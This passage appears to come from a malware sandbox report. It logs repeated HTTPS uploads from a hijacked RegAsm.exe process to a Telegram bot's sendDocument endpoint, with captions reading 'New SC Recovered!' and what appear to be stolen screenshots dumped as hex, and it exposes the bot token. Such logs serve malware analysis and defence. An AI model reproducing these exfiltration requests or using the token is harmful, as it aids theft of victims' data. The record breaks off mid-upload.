                                                2024-05-24 05:45:06 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:45:06 UTC1179OUTData Raw: 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5 b6 bd e6 d8 10 65 e4 3b 41 c7 a6 ee bf ad 65 78 ab c4 f0 49 6a f6 16 12 09 0c 83 12 48 bd 00 f4 1e b5 c4 51 5c 8f 06 a7 55 54 a8 ef 6d 91 b5 29 ba 54 dc 17 5e a1 45 14 57 71 01 5a fa 46 a8 b0 27 d9 e7 38 4f e1 6f 4f 6a 64 3e 1c d5 e7 85 26 8e d3 74 72 28 65 3e 62 0c 83 c8 ef 4f ff 00 84 5f 5a ff 00 9f 2f fc 8a 9f e3 4a 54 dc 95 9a 33 9f 24 95 9b 3a fd 33 54 bc 99 92 18 ae c7 97 fd fc 29 2a be cc 79 15 1f 88 bc 51 6d 69 68 f6 d6 53 09 ae 58 15 dc a7 21 3d f3 dc d7 29 ff 00 08 be b5 ff 00 3e 5f f9 15 3f c6 8f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 35 c7 3c 03 ab 35 2a 8d b4 ba 1a d0 aa a8 c5 c5 3d 5f 53 1e 8a d2 1a 0e a8 c0 11 6b c1 e7 ef af f8 d6 7c b1 bc 52 bc 52 0c 3a
                                                Data Ascii: V `2+EIY8)34Ne;AexIjHQ\UTm)T^EWqZF'8OoOjd>&tr(e>bO_Z/JT3$:3T)*yQmihSX!=)>_?E5<5*=_Sk|RR:
                                                2024-05-24 05:45:06 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 30 62 62 61 31 36 61 61 62 30 32 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcd0bba16aab02--
                                                2024-05-24 05:45:06 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:45:06 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.749725149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:45:17 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcd5bf69ee82a1
                                                Host: api.telegram.org
                                                Content-Length: 66989
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:45:17 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:45:17 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 35 62 66 36 39 65 65 38 32 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 35 62 66 36 39 65 65 38 32 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 31 35 2f 32 30 32 34 20 31 39 3a 31 38 3a 34 37 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcd5bf69ee82a1Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcd5bf69ee82a1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/15/2024 19:18:47User
                                                2024-05-24 05:45:17 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:45:17 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:45:17 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:45:17 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:45:17 UTC1403OUTData Raw: 2b 73 4c f1 24 f6 76 3f 60 b9 b5 82 fe cf 3b 96 1b 85 c8 53 ea 0f 6f c2 b0 e8 aa 20 dc d4 fc 49 3d e5 8f d8 2d ad 60 b0 b3 ce e6 86 dd 70 18 fa 93 df f1 ac 3a 28 a0 02 8a 28 a6 01 5a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d ab 22 8a 40 69 cb ae 5f 4f 3c 33 dc 49 e7 cd 15 b4 96 de 64 a5 99 99 5c 38 24 92 79 20 48 71 f4 15 99 45 14 00 51 45 14 00 57 5d 37 8c 62 b9 8e 24 96 d1 e3 f2 d7 00 ab 06 cf f2 c7 4a e4 68 a4 92 e7 53 ea b6 07 ac 5c 7a 33 b2 9b c6 d0 cf 17 94 da 69 88 1e ae b2 06 3f 96 07 f3 ac fd 67 c4 ab a8 e9 0b a7 25 b3 2a ab 87 12 33 72 71 9e d8 f7 f5 ae 76 8a ce 34 61 18 a8 25 a2 77 eb b9 4e 6d cb 9b ad ac 14 51 45 6a 48 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5
                                                Data Ascii: +sL$v?`;So I=-`p:((Z>'..V/1q\:3"@i_O<3Id\8$y HqEQEW]7b$JhS\z3i?g%*3rqv4a%wNmQEjHV `2+EIY8)34N
                                                2024-05-24 05:45:17 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 35 62 66 36 39 65 65 38 32 61 31 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcd5bf69ee82a1--
                                                2024-05-24 05:45:18 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:45:18 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.749726149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:45:22 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcd96a0224ce84
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:45:23 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:45:23 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 39 36 61 30 32 32 34 63 65 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 39 36 61 30 32 32 34 63 65 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 32 30 2f 32 30 32 34 20 31 31 3a 33 37 3a 33 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcd96a0224ce84Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcd96a0224ce84Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/20/2024 11:37:30User
                                                2024-05-24 05:45:23 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:45:23 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:45:23 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:45:23 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:45:23 UTC1179OUTData Raw: 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5 b6 bd e6 d8 10 65 e4 3b 41 c7 a6 ee bf ad 65 78 ab c4 f0 49 6a f6 16 12 09 0c 83 12 48 bd 00 f4 1e b5 c4 51 5c 8f 06 a7 55 54 a8 ef 6d 91 b5 29 ba 54 dc 17 5e a1 45 14 57 71 01 5a fa 46 a8 b0 27 d9 e7 38 4f e1 6f 4f 6a 64 3e 1c d5 e7 85 26 8e d3 74 72 28 65 3e 62 0c 83 c8 ef 4f ff 00 84 5f 5a ff 00 9f 2f fc 8a 9f e3 4a 54 dc 95 9a 33 9f 24 95 9b 3a fd 33 54 bc 99 92 18 ae c7 97 fd fc 29 2a be cc 79 15 1f 88 bc 51 6d 69 68 f6 d6 53 09 ae 58 15 dc a7 21 3d f3 dc d7 29 ff 00 08 be b5 ff 00 3e 5f f9 15 3f c6 8f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 35 c7 3c 03 ab 35 2a 8d b4 ba 1a d0 aa a8 c5 c5 3d 5f 53 1e 8a d2 1a 0e a8 c0 11 6b c1 e7 ef af f8 d6 7c b1 bc 52 bc 52 0c 3a
                                                Data Ascii: V `2+EIY8)34Ne;AexIjHQ\UTm)T^EWqZF'8OoOjd>&tr(e>bO_Z/JT3$:3T)*yQmihSX!=)>_?E5<5*=_Sk|RR:
                                                2024-05-24 05:45:23 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 39 36 61 30 32 32 34 63 65 38 34 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcd96a0224ce84--
                                                2024-05-24 05:45:23 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:45:23 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.749727149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:45:30 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcdd588123294f
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22192.168.2.749728149.154.167.220443
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:45:30 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc7b9c07669e21
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:45:31 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:45:31 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 39 63 30 37 36 36 39 65 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 39 63 30 37 36 36 39 65 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 34 2f 32 30 32 34 20 30 32 3a 34 38 3a 34 34 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc7b9c07669e21Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc7b9c07669e21Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/24/2024 02:48:44User
                                                2024-05-24 05:45:31 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:45:31 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f 